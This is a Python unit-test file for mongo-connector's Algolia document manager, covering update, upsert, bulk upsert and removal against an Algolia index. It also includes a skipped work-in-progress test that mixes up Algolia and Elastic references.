from mongo_connector.command_helper import CommandHelper
from mongo_connector.doc_managers.algolia_doc_manager import DocManager
class AlgoliaDocManagerTester(AlgoliaTestCase):
    """Unit tests for the Algolia DocManager.

    Relies on the fixtures provided by AlgoliaTestCase: ``self.algolia_doc``
    (the DocManager under test) and ``self.algolia_index`` (the backing
    Algolia index used to verify results).
    """

    def test_update(self):
        """Test the update method."""
        # Seed the index with one document before applying update specs.
        doc = {"_id": '1', "a": 1, "b": 2}
        self.algolia_doc.upsert(doc)
        self.algolia_doc.commit(True)

        # $set only
        update_spec = {"$set": {"a": 1, "b": 2}}
        self.algolia_doc.update(doc, update_spec)
        self.algolia_doc.commit(True)
        doc = self.algolia_index.getObject('1')
        self.assertEqual(doc, {"_id": '1', "objectID": '1', "a": 1, "b": 2})

        # $unset only
        # An unset field comes back as None rather than being removed.
        update_spec = {"$unset": {"a": True}}
        self.algolia_doc.update(doc, update_spec)
        self.algolia_doc.commit(True)
        doc = self.algolia_index.getObject('1')
        self.assertEqual(doc, {"_id": '1', "objectID": '1', "b": 2, "a": None})

        # mixed $set/$unset
        update_spec = {"$unset": {"b": True}, "$set": {"c": 3}}
        self.algolia_doc.update(doc, update_spec)
        self.algolia_doc.commit(True)
        doc = self.algolia_index.getObject('1')
        self.assertEqual(doc, {"_id": '1', "objectID": '1', "c": 3, "a": None, "b": None})

    def test_upsert(self):
        """Test the upsert method."""
        docc = {'_id': '1', 'name': 'John'}
        self.algolia_doc.upsert(docc)
        self.algolia_doc.commit(True)
        # An empty query returns everything in the index.
        res = self.algolia_index.search('')["hits"]
        for doc in res:
            self.assertEqual(doc['_id'], '1')
            self.assertEqual(doc['name'], 'John')

    def test_bulk_upsert(self):
        """Test the bulk_upsert method."""
        # Bulk-upserting an empty iterable must be a no-op, not an error.
        self.algolia_doc.bulk_upsert([], *TESTARGS)
        self.algolia_doc.commit(True)

        docs = ({"_id": i} for i in range(100))
        self.algolia_doc.bulk_upsert(docs, *TESTARGS)
        self.algolia_doc.commit(True)

        # All 100 documents should be present with their original ids.
        res = self.algolia_index.search('', { 'hitsPerPage': 101 })["hits"]
        returned_ids = sorted(int(doc["_id"]) for doc in res)
        self.assertEqual(len(returned_ids), 100)
        for i, r in enumerate(returned_ids):
            self.assertEqual(r, i)

        # Re-upserting the same ids with a new field updates in place.
        docs = ({"_id": i, "weight": 2*i} for i in range(100))
        self.algolia_doc.bulk_upsert(docs, *TESTARGS)
        self.algolia_doc.commit(True)
        res = self.algolia_index.search('', { 'hitsPerPage': 101 })["hits"]
        returned_ids = sorted(int(doc["weight"]) for doc in res)
        self.assertEqual(len(returned_ids), 100)
        for i, r in enumerate(returned_ids):
            self.assertEqual(r, 2*i)

    def test_remove(self):
        """Test the remove method."""
        docc = {'_id': '1', 'name': 'John'}
        self.algolia_doc.upsert(docc)
        self.algolia_doc.commit(True)
        res = self.algolia_index.search('')["hits"]
        self.assertEqual(len(res), 1)

        # Removing the document should leave the index empty.
        self.algolia_doc.remove(docc)
        self.algolia_doc.commit(True)
        res = self.algolia_index.search('')["hits"]
        self.assertEqual(len(res), 0)

    @unittest.skip("WIP")
    def test_get_last_doc(self):
        """Test the get_last_doc method.

        Make sure we can retrieve the document most recently modified from Algolia.
        """
        # NOTE(review): this skipped WIP test mixes self.algolia_doc and
        # self.elastic_doc (likely copied from the Elastic test suite);
        # the elastic_doc references need fixing before un-skipping.
        base = self.algolia_doc.get_last_doc()
        ts = base.get("_ts", 0) if base else 0
        docc = {'_id': '4', 'name': 'Hare', '_ts': ts+3, 'ns': 'test.test'}
        self.algolia_doc.upsert(docc)
        docc = {'_id': '5', 'name': 'Tortoise', '_ts': ts+2, 'ns': 'test.test'}
        self.algolia_doc.upsert(docc)
        docc = {'_id': '6', 'name': 'Mr T.', '_ts': ts+1, 'ns': 'test.test'}
        self.algolia_doc.upsert(docc)
        self.algolia_doc.commit(True)
        self.assertEqual(self.algolia_index.search('')['nbHits'], 3)
        # The most recently modified document (largest _ts) should win.
        doc = self.elastic_doc.get_last_doc()
        self.assertEqual(doc['_id'], '4')
        docc = {'_id': '6', 'name': 'HareTwin', '_ts': ts+4, 'ns': 'test.test'}
        self.elastic_doc.upsert(docc)
        self.algolia_doc.commit(True)
        doc = self.elastic_doc.get_last_doc()
        self.assertEqual(doc['_id'], '6')
        self.assertEqual(self.algolia_index.search('')['nbHits'], 3)
if __name__ == '__main__':
    # Run this module's test cases with the stdlib unittest runner.
    unittest.main()
| 38.298507 | 90 | 0.616329 | 690 | 5,132 | 4.424638 | 0.237681 | 0.129708 | 0.119227 | 0.078611 | 0.542745 | 0.52342 | 0.483459 | 0.476253 | 0.432034 | 0.432034 | 0 | 0.018663 | 0.227397 | 5,132 | 133 | 91 | 38.586466 | 0.751324 | 0.171083 | 0 | 0.454545 | 0 | 0 | 0.077879 | 0 | 0 | 0 | 0 | 0 | 0.170455 | 1 | 0.056818 | false | 0 | 0.090909 | 0 | 0.159091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |